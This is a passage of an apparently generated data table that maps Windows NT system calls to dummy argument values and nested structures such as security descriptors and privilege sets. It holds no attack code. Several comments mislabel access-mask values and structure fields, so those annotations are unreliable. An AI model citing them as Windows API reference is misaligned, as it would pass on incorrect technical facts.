"NtWaitForMultipleObjects32", "pushes": [ { "value": "0x00000000", "additionalComment": "PLARGE_INTEGER Time_Out (None, wait indefinitely)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "BOOLEAN Alertable (FALSE, not alertable)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "WAIT_TYPE WaitType (WaitAll, default value)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PLONG Handles (None, no handles provided)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "ULONG ObjectCount (0, no objects to wait for)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtReplyWaitReceivePortEx": { "ntFunc": "NtReplyWaitReceivePortEx", "pushes": [ { "value": "0x00000000", "additionalComment": "PLARGE_INTEGER Time_Out (None, wait indefinitely)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PPORT_MESSAGE ReceiveMessage (None, no receive message buffer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PPORT_MESSAGE ReplyMessage (None, no reply message buffer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PVOID PortContext (None, no port context)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "HANDLE PortHandle (None, no port handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtQueryDefaultUILanguage": { "ntFunc": "NtQueryDefaultUILanguage", "pushes": [ { "value": "0x00000000", "additionalComment": "LANGID DefaultUILanguageId (None, output parameter, will be filled by function)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtApphelpCacheControl": { "ntFunc": "NtApphelpCacheControl", "pushes": [ { "value": "0x00000000", "additionalComment": "None ServiceContext (no context provided)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000001", "additionalComment": "AHC_SERVICE_CLASS ServiceClass (e.g., ApphelpCheckExe)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtCreateProcessEx": { "ntFunc": "NtCreateProcessEx", "pushes": [ { "value": "0x00000000", "additionalComment": "BOOLEAN InJob (FALSE, not in job)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "HANDLE ExceptionPort (None, no exception port)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "HANDLE DebugPort (None, no debug port)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0000", "additionalComment": "HANDLE SectionHandle (dummy handle, e.g., section for image)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000001", "additionalComment": "BOOLEAN InheritObjectTable (TRUE, inherit handles)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE ParentProcess (dummy handle, e.g., current process)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "Pointer to OBJECT_ATTRIBUTES (dummy pointer)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct1", "structureValueExpectations": "Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None }, { "value": "0x001F0FFF", "additionalComment": "ACCESS_MASK DesiredAccess (PROCESS_ALL_ACCESS)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0020", "additionalComment": "Pointer to HANDLE ProcessHandle (dummy pointer, receives new process handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": { "struct1": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0x00000000", "fieldComment": "None (no name)" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] } } }, "NtIsProcessInJob": { "ntFunc": "NtIsProcessInJob", "pushes": [ { "value": "0x00000000", "additionalComment": "HANDLE JobHandle (None, current job)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE ProcessHandle (dummy handle, e.g., current process)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtAccessCheckByTypeAndAuditAlarm": { "ntFunc": "NtAccessCheckByTypeAndAuditAlarm", "pushes": [ { "value": "0xbadd0030", "additionalComment": "Pointer to BOOLEAN GenerateOnClose (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0xbadd0040", "additionalComment": "Pointer to NTSTATUS (dummy pointer, receives status)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0xbadd0050", "additionalComment": "Pointer to ACCESS_MASK GrantedAccess (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000000", "additionalComment": "BOOLEAN ObjectCreation (FALSE, not object creation)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0060", "additionalComment": "Pointer to GENERIC_MAPPING (dummy pointer)", "structurePointer": "GENERIC_MAPPING", "structureRef": "struct2", "structureValueExpectations": "GENERIC_READ/WRITE/EXECUTE/ALL mappings.", "pointedValue": None }, { "value": "0x00000001", "additionalComment": "ULONG ObjectTypeListLength (1 object type)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0070", "additionalComment": "Pointer to OBJECT_TYPE_LIST (dummy pointer)", "structurePointer": "OBJECT_TYPE_LIST", "structureRef": "struct3", "structureValueExpectations": "Array of object type entries.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "ULONG Flags (no flags)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000002", "additionalComment": "AUDIT_EVENT_TYPE AuditType (ObjectAccess)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00120089", "additionalComment": "ACCESS_MASK DesiredAccess (e.g., READ_CONTROL | WRITE_DAC)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0080", "additionalComment": "Pointer to SID PrincipalSelfSid (dummy pointer)", "structurePointer": "SID", "structureRef": "struct4", "structureValueExpectations": "SID structure for principal.", "pointedValue": None }, { "value": "0xbadd0090", "additionalComment": "Pointer to SECURITY_DESCRIPTOR (dummy pointer)", "structurePointer": "SECURITY_DESCRIPTOR", "structureRef": "struct5", "structureValueExpectations": "Security descriptor for object.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PUNICODE_STRING ObjectName (None, no name)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PUNICODE_STRING ObjectTypeName (None, no type name)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PVOID HandleId (None, not used)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd00a0", "additionalComment": "Pointer to UNICODE_STRING SubsystemName (dummy pointer)", "structurePointer": "UNICODE_STRING", "structureRef": "struct6", "structureValueExpectations": "Name of the subsystem.", "pointedValue": None } ], "structures": { "struct2": { "type": "GENERIC_MAPPING", "fields": [ { "fieldName": "GenericRead", "fieldType": "ACCESS_MASK", "fieldValue": "0x80000000", "fieldComment": "GENERIC_READ" }, { "fieldName": "GenericWrite", "fieldType": "ACCESS_MASK", "fieldValue": "0x40000000", "fieldComment": "GENERIC_WRITE" }, { "fieldName": "GenericExecute", "fieldType": "ACCESS_MASK", "fieldValue": "0x20000000", "fieldComment": "GENERIC_EXECUTE" }, { "fieldName": "GenericAll", "fieldType": "ACCESS_MASK", "fieldValue": "0x10000000", "fieldComment": "GENERIC_ALL" } ] }, "struct3": { "type": "OBJECT_TYPE_LIST", "fields": [ { "fieldName": "Level", "fieldType": "WORD", "fieldValue": "0x0000", "fieldComment": "Top-level object" }, { "fieldName": "Sbz", "fieldType": "WORD", "fieldValue": "0x0000", "fieldComment": "Reserved" }, { "fieldName": "ObjectType", "fieldType": "GUID*", "fieldValue": "0xbadd00c0", "fieldComment": "Pointer to object type GUID (dummy pointer)" } ] }, "struct4": { "type": "SID", "fields": [ { "fieldName": "Revision", "fieldType": "BYTE", "fieldValue": "0x01", "fieldComment": "SID revision" }, { "fieldName": "SubAuthorityCount", "fieldType": "BYTE", "fieldValue": "0x01", "fieldComment": "One subauthority" }, { "fieldName": "IdentifierAuthority", "fieldType": "BYTE[6]", "fieldValue": "0x000000000005", "fieldComment": "NT Authority" }, { "fieldName": "SubAuthority[0]", "fieldType": "ULONG", "fieldValue": "0x00000020", "fieldComment": "Local system" } ] }, "struct5": { "type": "SECURITY_DESCRIPTOR", "fields": [ { "fieldName": "Revision", "fieldType": "BYTE", "fieldValue": "0x01", "fieldComment": "Revision" }, { "fieldName": "Sbz1", "fieldType": "BYTE", "fieldValue": "0x00", "fieldComment": "Reserved" }, { "fieldName": "Control", "fieldType": "SECURITY_DESCRIPTOR_CONTROL", "fieldValue": "0x8004", "fieldComment": "SE_DACL_PRESENT | SE_SELF_RELATIVE" }, { "fieldName": "Owner", "fieldType": "PSID", "fieldValue": "0xbadd00d0", "fieldComment": "Pointer to owner SID (dummy pointer)" }, { "fieldName": "Group", "fieldType": "PSID", "fieldValue": "0xbadd00e0", "fieldComment": "Pointer to group SID (dummy pointer)" }, { "fieldName": "Sacl", "fieldType": "PACL", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "Dacl", "fieldType": "PACL", "fieldValue": "0xbadd00f0", "fieldComment": "Pointer to DACL (dummy pointer)" } ] }, "struct6": { "type": "UNICODE_STRING", "fields": [ { "fieldName": "Length", "fieldType": "USHORT", "fieldValue": "0x0014", "fieldComment": "20 bytes (10 UTF-16 chars)" }, { "fieldName": "MaximumLength", "fieldType": "USHORT", "fieldValue": "0x0020", "fieldComment": "32 bytes" }, { "fieldName": "Buffer", "fieldType": "PWSTR", "fieldValue": "0xbadd0100", "fieldComment": "Pointer to subsystem name string (dummy pointer)" } ] } } }, "NtTraceEvent": { "ntFunc": "NtTraceEvent", "pushes": [ { "value": "0xbadd00b0", "additionalComment": "Pointer to event fields buffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000020", "additionalComment": "ULONG FieldSize (32 bytes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000001", "additionalComment": "ULONG Flags (e.g., TRACE_EVENT_FLAG_CRITICAL)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x0000abcd", "additionalComment": "HANDLE TraceHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtPowerInformation": { "ntFunc": "NtPowerInformation", "pushes": [ { "value": "0x00000010", "additionalComment": "ULONG OutputBufferLength (typical small buffer size)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0000", "additionalComment": "Pointer to OutputBuffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000008", "additionalComment": "ULONG InputBufferLength (typical small input buffer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "Pointer to InputBuffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000001" }, { "value": "0x0000000c", "additionalComment": "POWER_INFORMATION_LEVEL InformationLevel (SystemPowerInformation)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtAccessCheckByType": { "ntFunc": "NtAccessCheckByType", "pushes": [ { "value": "0xbadd0020", "additionalComment": "Pointer to NTSTATUS ReturnStatus (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0xbadd0030", "additionalComment": "Pointer to ACCESS_MASK GrantedAccess (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000001" }, { "value": "0xbadd0040", "additionalComment": "Pointer to ULONG PrivilegeSetLength (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000010" }, { "value": "0xbadd0050", "additionalComment": "Pointer to PRIVILEGE_SET (dummy pointer)", "structurePointer": "PRIVILEGE_SET", "structureRef": "struct7", "structureValueExpectations": "PrivilegeCount, Control, array of LUID_AND_ATTRIBUTES.", "pointedValue": None }, { "value": "0xbadd0060", "additionalComment": "Pointer to GENERIC_MAPPING (dummy pointer)", "structurePointer": "GENERIC_MAPPING", "structureRef": "struct8", "structureValueExpectations": "GenericRead, GenericWrite, GenericExecute, GenericAll masks.", "pointedValue": None }, { "value": "0x00000001", "additionalComment": "ULONG ObjectTypeListLength (single object type)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0070", "additionalComment": "Pointer to OBJECT_TYPE_LIST (dummy pointer)", "structurePointer": "OBJECT_TYPE_LIST", "structureRef": "struct9", "structureValueExpectations": "Level, Sbz, Type pointer.", "pointedValue": None }, { "value": "0x00020019", "additionalComment": "ACCESS_MASK DesiredAccess (GENERIC_READ | GENERIC_EXECUTE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE ClientToken (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0080", "additionalComment": "Pointer to SID PrincipalSelfSid (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x01020300" }, { "value": "0xbadd0090", "additionalComment": "Pointer to SECURITY_DESCRIPTOR (dummy pointer)", "structurePointer": "SECURITY_DESCRIPTOR", "structureRef": "struct10", "structureValueExpectations": "Revision, Control, Owner, Group, SACL, DACL.", "pointedValue": None } ], "structures": { "struct7": { "type": "PRIVILEGE_SET", "fields": [ { "fieldName": "PrivilegeCount", "fieldType": "DWORD", "fieldValue": "0x00000001", "fieldComment": "One privilege in set" }, { "fieldName": "Control", "fieldType": "DWORD", "fieldValue": "0x00000001", "fieldComment": "SE_PRIVILEGE_ENABLED" }, { "fieldName": "Privilege[0].Luid.LowPart", "fieldType": "DWORD", "fieldValue": "0x00000017", "fieldComment": "LUID for SeDebugPrivilege" }, { "fieldName": "Privilege[0].Luid.HighPart", "fieldType": "LONG", "fieldValue": "0x00000000", "fieldComment": "High part of LUID" }, { "fieldName": "Privilege[0].Attributes", "fieldType": "DWORD", "fieldValue": "0x00000002", "fieldComment": "SE_PRIVILEGE_ENABLED" } ] }, "struct8": { "type": "GENERIC_MAPPING", "fields": [ { "fieldName": "GenericRead", "fieldType": "ACCESS_MASK", "fieldValue": "0x80000000", "fieldComment": "GENERIC_READ" }, { "fieldName": "GenericWrite", "fieldType": "ACCESS_MASK", "fieldValue": "0x40000000", "fieldComment": "GENERIC_WRITE" }, { "fieldName": "GenericExecute", "fieldType": "ACCESS_MASK", "fieldValue": "0x20000000", "fieldComment": "GENERIC_EXECUTE" }, { "fieldName": "GenericAll", "fieldType": "ACCESS_MASK", "fieldValue": "0x10000000", "fieldComment": "GENERIC_ALL" } ] }, "struct9": { "type": "OBJECT_TYPE_LIST", "fields": [ { "fieldName": "Level", "fieldType": "WORD", "fieldValue": "0x0001", "fieldComment": "Object type level" }, { "fieldName": "Sbz", "fieldType": "WORD", "fieldValue": "0x0000", "fieldComment": "Reserved" }, { "fieldName": "Type", "fieldType": "POINTER", "fieldValue": "0xbadd0300", "fieldComment": "Pointer to object type GUID (dummy pointer)" } ] }, "struct10": { "type": "SECURITY_DESCRIPTOR", "fields": [ { "fieldName": "Revision", "fieldType": "BYTE", "fieldValue": "0x01", "fieldComment": "SECURITY_DESCRIPTOR_REVISION" }, { "fieldName": "Sbz1", "fieldType": "BYTE", "fieldValue": "0x00", "fieldComment": "Reserved" }, { "fieldName": "Control", "fieldType": "WORD", "fieldValue": "0x8004", "fieldComment": "SE_DACL_PRESENT | SE_SELF_RELATIVE" }, { "fieldName": "Owner", "fieldType": "PSID", "fieldValue": "0xbadd0310", "fieldComment": "Pointer to owner SID (dummy pointer)" }, { "fieldName": "Group", "fieldType": "PSID", "fieldValue": "0xbadd0320", "fieldComment": "Pointer to group SID (dummy pointer)" }, { "fieldName": "Sacl", "fieldType": "PACL", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "Dacl", "fieldType": "PACL", "fieldValue": "0xbadd0330", "fieldComment": "Pointer to DACL (dummy pointer)" } ] } } }, "NtAccessCheckByTypeResultList": { "ntFunc": "NtAccessCheckByTypeResultList", "pushes": [ { "value": "0xbadd00a0", "additionalComment": "Pointer to NTSTATUS ReturnStatus (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0xbadd00b0", "additionalComment": "Pointer to ACCESS_MASK GrantedAccess (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000001" }, { "value": "0xbadd00c0", "additionalComment": "Pointer to ULONG PrivilegeSetLength (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000010" }, { "value": "0xbadd00d0", "additionalComment": "Pointer to PRIVILEGE_SET (dummy pointer)", "structurePointer": "PRIVILEGE_SET", "structureRef": "struct7", "structureValueExpectations": "PrivilegeCount, Control, array of LUID_AND_ATTRIBUTES.", "pointedValue": None }, { "value": "0xbadd00e0", "additionalComment": "Pointer to GENERIC_MAPPING (dummy pointer)", "structurePointer": "GENERIC_MAPPING", "structureRef": "struct8", "structureValueExpectations": "GenericRead, GenericWrite, GenericExecute, GenericAll masks.", "pointedValue": None }, { "value": "0x00000001", "additionalComment": "ULONG ObjectTypeListLength (single object type)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd00f0", "additionalComment": "Pointer to OBJECT_TYPE_LIST (dummy pointer)", "structurePointer": "OBJECT_TYPE_LIST", "structureRef": "struct9", "structureValueExpectations": "Level, Sbz, Type pointer.", "pointedValue": None }, { "value": "0x00020019", "additionalComment": "ACCESS_MASK DesiredAccess (GENERIC_READ | GENERIC_EXECUTE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE ClientToken (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0100", "additionalComment": "Pointer to SID PrincipalSelfSid (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x01020300" }, { "value": "0xbadd0110", "additionalComment": "Pointer to SECURITY_DESCRIPTOR (dummy pointer)", "structurePointer": "SECURITY_DESCRIPTOR", "structureRef": "struct10", "structureValueExpectations": "Revision, Control, Owner, Group, SACL, DACL.", "pointedValue": None } ], "structures": { "struct7": { "type": "PRIVILEGE_SET", "fields": [ { "fieldName": "PrivilegeCount", "fieldType": "DWORD", "fieldValue": "0x00000001", "fieldComment": "One privilege in set" }, { "fieldName": "Control", "fieldType": "DWORD", "fieldValue": "0x00000001", "fieldComment": "SE_PRIVILEGE_ENABLED" }, { "fieldName": "Privilege[0].Luid.LowPart", "fieldType": "DWORD", "fieldValue": "0x00000017", "fieldComment": "LUID for SeDebugPrivilege" }, { "fieldName": "Privilege[0].Luid.HighPart", "fieldType": "LONG", "fieldValue": "0x00000000", "fieldComment": "High part of LUID" }, { "fieldName": "Privilege[0].Attributes", "fieldType": "DWORD", "fieldValue": "0x00000002", "fieldComment": "SE_PRIVILEGE_ENABLED" } ] }, "struct8": { "type": "GENERIC_MAPPING", "fields": [ { "fieldName": "GenericRead", "fieldType": "ACCESS_MASK", "fieldValue": "0x80000000", "fieldComment": "GENERIC_READ" }, { "fieldName": "GenericWrite", "fieldType": "ACCESS_MASK", "fieldValue": "0x40000000", "fieldComment": "GENERIC_WRITE" }, { "fieldName": "GenericExecute", "fieldType": "ACCESS_MASK", "fieldValue": "0x20000000", "fieldComment": "GENERIC_EXECUTE" }, { "fieldName": "GenericAll", "fieldType": "ACCESS_MASK", "fieldValue": "0x10000000", "fieldComment": "GENERIC_ALL" } ] }, "struct9": { "type": "OBJECT_TYPE_LIST", "fields": [ { "fieldName": "Level", "fieldType": "WORD", "fieldValue": "0x0001", "fieldComment": "Object type level" }, { "fieldName": "Sbz", "fieldType": "WORD", "fieldValue": "0x0000", "fieldComment": "Reserved" }, { "fieldName": "Type", "fieldType": "POINTER", "fieldValue": "0xbadd0300", "fieldComment": "Pointer to object type GUID (dummy pointer)" } ] }, "struct10": { "type": "SECURITY_DESCRIPTOR", "fields": [ { "fieldName": "Revision", "fieldType": "BYTE", "fieldValue": "0x01", "fieldComment": "SECURITY_DESCRIPTOR_REVISION" }, { "fieldName": "Sbz1", "fieldType": "BYTE", "fieldValue": "0x00", "fieldComment": "Reserved" }, { "fieldName": "Control", "fieldType": "WORD", "fieldValue": "0x8004", "fieldComment": "SE_DACL_PRESENT | SE_SELF_RELATIVE" }, { "fieldName": "Owner", "fieldType": "PSID", "fieldValue": "0xbadd0310", "fieldComment": "Pointer to owner SID (dummy pointer)" }, { "fieldName": "Group", "fieldType": "PSID", "fieldValue": "0xbadd0320", "fieldComment": "Pointer to group SID (dummy pointer)" }, { "fieldName": "Sacl", "fieldType": "PACL", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "Dacl", "fieldType": "PACL", "fieldValue": "0xbadd0330", "fieldComment": "Pointer to DACL (dummy pointer)" } ] } } }, "NtAccessCheckByTypeResultListAndAuditAlarm": { "ntFunc": "NtAccessCheckByTypeResultListAndAuditAlarm", "pushes": [ { "value": "0xbadd0120", "additionalComment": "Pointer to BOOLEAN GenerateOnClose (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00" }, { "value": "0xbadd0130", "additionalComment": "Pointer to NTSTATUS ReturnStatus (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0xbadd0140", "additionalComment": "Pointer to ACCESS_MASK GrantedAccess (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000001" }, { "value": "0x00", "additionalComment": "BOOLEAN ObjectCreation (FALSE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0150", "additionalComment": "Pointer to GENERIC_MAPPING (dummy pointer)", "structurePointer": "GENERIC_MAPPING", "structureRef": "struct8", "structureValueExpectations": "GenericRead, GenericWrite, GenericExecute, GenericAll masks.", "pointedValue": None }, { "value": "0x00000001", "additionalComment": "ULONG ObjectTypeListLength (single object type)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0160", "additionalComment": "Pointer to OBJECT_TYPE_LIST (dummy pointer)", "structurePointer": "OBJECT_TYPE_LIST", "structureRef": "struct9", "structureValueExpectations": "Level, Sbz, Type pointer.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "ULONG Flags (no flags set)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000002", "additionalComment": "AUDIT_EVENT_TYPE AuditType (ObjectAccess)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00020019", "additionalComment": "ACCESS_MASK DesiredAccess (GENERIC_READ | GENERIC_EXECUTE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0170", "additionalComment": "Pointer to SID PrincipalSelfSid (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x01020300" }, { "value": "0xbadd0180", "additionalComment": "Pointer to SECURITY_DESCRIPTOR (dummy pointer)", "structurePointer": "SECURITY_DESCRIPTOR", "structureRef": "struct10", "structureValueExpectations": "Revision, Control, Owner, Group, SACL, DACL.", "pointedValue": None }, { "value": "0xbadd0190", "additionalComment": "Pointer to UNICODE_STRING ObjectName (dummy pointer)", "structurePointer": "UNICODE_STRING", "structureRef": "struct11", "structureValueExpectations": "Length, MaximumLength, Buffer pointer.", "pointedValue": None }, { "value": "0xbadd01a0", "additionalComment": "Pointer to UNICODE_STRING ObjectTypeName (dummy pointer)", "structurePointer": "UNICODE_STRING", "structureRef": "struct12", "structureValueExpectations": "Length, MaximumLength, Buffer pointer.", "pointedValue": None }, { "value": "0xbadd01b0", "additionalComment": "Pointer to HandleId (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000001" }, { "value": "0xbadd01c0", "additionalComment": "Pointer to UNICODE_STRING SubsystemName (dummy pointer)", "structurePointer": "UNICODE_STRING", "structureRef": "struct13", "structureValueExpectations": "Length, MaximumLength, Buffer pointer.", "pointedValue": None } ], "structures": { "struct8": { "type": "GENERIC_MAPPING", "fields": [ { "fieldName": "GenericRead", "fieldType": "ACCESS_MASK", "fieldValue": "0x80000000", "fieldComment": "GENERIC_READ" }, { "fieldName": "GenericWrite", "fieldType": "ACCESS_MASK", "fieldValue": "0x40000000", "fieldComment": "GENERIC_WRITE" }, { "fieldName": "GenericExecute", "fieldType": "ACCESS_MASK", "fieldValue": "0x20000000", "fieldComment": "GENERIC_EXECUTE" }, { "fieldName": "GenericAll", "fieldType": "ACCESS_MASK", "fieldValue": "0x10000000", "fieldComment": "GENERIC_ALL" } ] }, "struct9": { "type": "OBJECT_TYPE_LIST", "fields": [ { "fieldName": "Level", "fieldType": "WORD", "fieldValue": "0x0001", "fieldComment": "Object type level" }, { "fieldName": "Sbz", "fieldType": "WORD", "fieldValue": "0x0000", "fieldComment": "Reserved" }, { "fieldName": "Type", "fieldType": "POINTER", "fieldValue": "0xbadd0300", "fieldComment": "Pointer to object type GUID (dummy pointer)" } ] }, "struct10": { "type": "SECURITY_DESCRIPTOR", "fields": [ { "fieldName": "Revision", "fieldType": "BYTE", "fieldValue": "0x01", "fieldComment": "SECURITY_DESCRIPTOR_REVISION" }, { "fieldName": "Sbz1", "fieldType": "BYTE", "fieldValue": "0x00", "fieldComment": "Reserved" }, { "fieldName": "Control", "fieldType": "WORD", "fieldValue": "0x8004", "fieldComment": "SE_DACL_PRESENT | SE_SELF_RELATIVE" }, { "fieldName": "Owner", "fieldType": "PSID", "fieldValue": "0xbadd0310", "fieldComment": "Pointer to owner SID (dummy pointer)" }, { "fieldName": "Group", "fieldType": "PSID", "fieldValue": "0xbadd0320", "fieldComment": "Pointer to group SID (dummy pointer)" }, { "fieldName": "Sacl", "fieldType": "PACL", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "Dacl", "fieldType": "PACL", "fieldValue": "0xbadd0330", "fieldComment": "Pointer to DACL (dummy pointer)" } ] }, "struct11": { "type": "UNICODE_STRING", "fields": [ { "fieldName": "Length", "fieldType": "USHORT", "fieldValue": "0x0010", "fieldComment": "String length in bytes" }, { "fieldName": "MaximumLength", "fieldType": "USHORT", "fieldValue": "0x0020", "fieldComment": "Maximum buffer size in bytes" }, { "fieldName": "Buffer", "fieldType": "PWSTR", "fieldValue": "0xbadd0340", "fieldComment": "Pointer to wide string buffer (dummy pointer)" } ] }, "struct12": { "type": "UNICODE_STRING", "fields": [ { "fieldName": "Length", "fieldType": "USHORT", "fieldValue": "0x0012", "fieldComment": "String length in bytes" }, { "fieldName": "MaximumLength", "fieldType": "USHORT", "fieldValue": "0x0022", "fieldComment": "Maximum buffer size in bytes" }, { "fieldName": "Buffer", "fieldType": "PWSTR", "fieldValue": "0xbadd0350", "fieldComment": "Pointer to wide string buffer (dummy pointer)" } ] }, "struct13": { "type": "UNICODE_STRING", "fields": [ { "fieldName": "Length", "fieldType": "USHORT", "fieldValue": "0x0014", "fieldComment": "String length in bytes" }, { "fieldName": "MaximumLength", "fieldType": "USHORT", "fieldValue": "0x0024", "fieldComment": "Maximum buffer size in bytes" }, { "fieldName": "Buffer", "fieldType": "PWSTR", "fieldValue": "0xbadd0360", 